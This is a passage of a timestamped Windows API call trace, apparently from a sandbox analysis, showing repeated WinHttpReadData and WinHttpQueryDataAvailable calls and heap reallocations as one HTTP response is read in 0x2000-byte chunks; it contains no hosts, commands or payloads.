	[0195.055] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.055] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2772bb8, Size=0x2df00) returned 0x2772bb8
	[0195.055] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x279eab5, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x279eab5*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.055] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.055] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2772bb8, Size=0x2ff00) returned 0x2772bb8
	[0195.055] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x27a0ab5, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x27a0ab5*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.055] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.077] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2772bb8, Size=0x31f00) returned 0x2772bb8
	[0195.077] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x27a2ab5, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x27a2ab5*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.077] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.080] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2772bb8, Size=0x33f00) returned 0x2772bb8
	[0195.080] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x27a4ab5, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x27a4ab5*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.080] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.081] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2772bb8, Size=0x35f00) returned 0x2772bb8
	[0195.081] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x27a6ab5, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x27a6ab5*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.081] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.088] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2772bb8, Size=0x37f00) returned 0x2772bb8
	[0195.088] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x27a8ab5, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x27a8ab5*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.088] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.088] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2772bb8, Size=0x39f00) returned 0x2772bb8
	[0195.088] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x27aaab5, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x27aaab5*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.088] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.089] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2772bb8, Size=0x3bf00) returned 0x2772bb8
	[0195.089] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x27acab5, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x27acab5*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.089] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.089] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2772bb8, Size=0x3df00) returned 0x2772bb8
	[0195.089] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x27aeab5, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x27aeab5*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.089] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.090] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2772bb8, Size=0x3ff00) returned 0x2772bb8
	[0195.090] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x27b0ab5, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x27b0ab5*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.090] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.090] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2772bb8, Size=0x41f00) returned 0x2772bb8
	[0195.090] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x27b2ab5, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x27b2ab5*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.090] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.091] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2772bb8, Size=0x43f00) returned 0x2772bb8
	[0195.091] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x27b4ab5, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x27b4ab5*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.091] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.091] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2772bb8, Size=0x45f00) returned 0x2772bb8
	[0195.091] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x27b6ab5, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x27b6ab5*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.091] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.092] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2772bb8, Size=0x47f00) returned 0x2772bb8
	[0195.092] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x27b8ab5, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x27b8ab5*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.092] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.092] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2772bb8, Size=0x49f00) returned 0x2772bb8
	[0195.092] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x27baab5, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x27baab5*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.092] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.092] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2772bb8, Size=0x4bf00) returned 0x2772bb8
	[0195.093] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x27bcab5, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x27bcab5*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.093] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.093] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2772bb8, Size=0x4df00) returned 0x2772bb8
	[0195.093] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x27beab5, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x27beab5*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.093] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.093] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2772bb8, Size=0x4ff00) returned 0x2772bb8
	[0195.093] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x27c0ab5, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x27c0ab5*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.093] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.117] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2772bb8, Size=0x51f00) returned 0x2772bb8
	[0195.118] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x27c2ab5, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x27c2ab5*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.118] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.119] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2772bb8, Size=0x53f00) returned 0x2772bb8
	[0195.119] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x27c4ab5, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x27c4ab5*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.119] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.119] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2772bb8, Size=0x55f00) returned 0x2772bb8
	[0195.119] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x27c6ab5, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x27c6ab5*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.119] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.120] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2772bb8, Size=0x57f00) returned 0x2772bb8
	[0195.120] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x27c8ab5, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x27c8ab5*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.120] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.120] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2772bb8, Size=0x59f00) returned 0x2772bb8
	[0195.120] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x27caab5, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x27caab5*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.120] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.121] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2772bb8, Size=0x5bf00) returned 0x2772bb8
	[0195.121] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x27ccab5, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x27ccab5*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.121] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.121] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2772bb8, Size=0x5df00) returned 0x2772bb8
	[0195.121] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x27ceab5, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x27ceab5*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.121] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.123] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2772bb8, Size=0x5ff00) returned 0x27d0ac0
	[0195.128] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x282e9bd, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x282e9bd*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.128] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.128] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27d0ac0, Size=0x61f00) returned 0x2890048
	[0195.138] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x28eff45, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x28eff45*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.138] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.139] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2890048, Size=0x63f00) returned 0x2772bb8
	[0195.147] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x27d4ab5, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x27d4ab5*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.147] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.148] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2772bb8, Size=0x65f00) returned 0x27d6ac0
	[0195.152] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x283a9bd, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x283a9bd*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.152] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.153] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27d6ac0, Size=0x67f00) returned 0x2890048
	[0195.202] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x28f5f45, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x28f5f45*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.203] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.203] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2890048, Size=0x69f00) returned 0x2890048
	[0195.204] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x28f7f45, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x28f7f45*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.204] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.205] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2890048, Size=0x6bf00) returned 0x2890048
	[0195.205] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x28f9f45, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x28f9f45*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.205] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.205] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2890048, Size=0x6df00) returned 0x2890048
	[0195.205] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x28fbf45, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x28fbf45*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.206] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.206] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2890048, Size=0x6ff00) returned 0x2890048
	[0195.206] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x28fdf45, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x28fdf45*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.206] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.207] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2890048, Size=0x71f00) returned 0x2890048
	[0195.207] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x28fff45, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x28fff45*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.207] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.208] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2890048, Size=0x73f00) returned 0x2890048
	[0195.208] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2901f45, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2901f45*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.208] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.208] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2890048, Size=0x75f00) returned 0x2890048
	[0195.208] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2903f45, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2903f45*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.209] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.209] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2890048, Size=0x77f00) returned 0x2890048
	[0195.209] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2905f45, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2905f45*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.209] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.210] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2890048, Size=0x79f00) returned 0x2890048
	[0195.210] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2907f45, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2907f45*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.210] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.211] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2890048, Size=0x7bf00) returned 0x2890048
	[0195.211] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2909f45, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2909f45*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.211] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.212] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2890048, Size=0x7df00) returned 0x2890048
	[0195.212] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x290bf45, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x290bf45*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.212] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.215] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2890048, Size=0x7ff00) returned 0xdb0020
	[0195.240] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0xe2df1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0xe2df1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.240] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.281] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0xdb0020, Size=0x81f00) returned 0x2590020
	[0195.291] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x260ff1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x260ff1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.291] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.291] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0x83f00) returned 0xdb0020
	[0195.302] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0xe31f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0xe31f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.302] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.302] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0xdb0020, Size=0x85f00) returned 0x2590020
	[0195.311] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2613f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2613f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.311] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.311] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0x87f00) returned 0xdb0020
	[0195.321] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0xe35f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0xe35f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.321] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.354] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0xdb0020, Size=0x89f00) returned 0x2590020
	[0195.362] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2617f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2617f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.362] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.363] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0x8bf00) returned 0xdb0020
	[0195.371] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0xe39f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0xe39f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.371] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.371] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0xdb0020, Size=0x8df00) returned 0x2590020
	[0195.381] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x261bf1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x261bf1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.381] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.381] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0x8ff00) returned 0xdb0020
	[0195.390] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0xe3df1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0xe3df1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.390] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
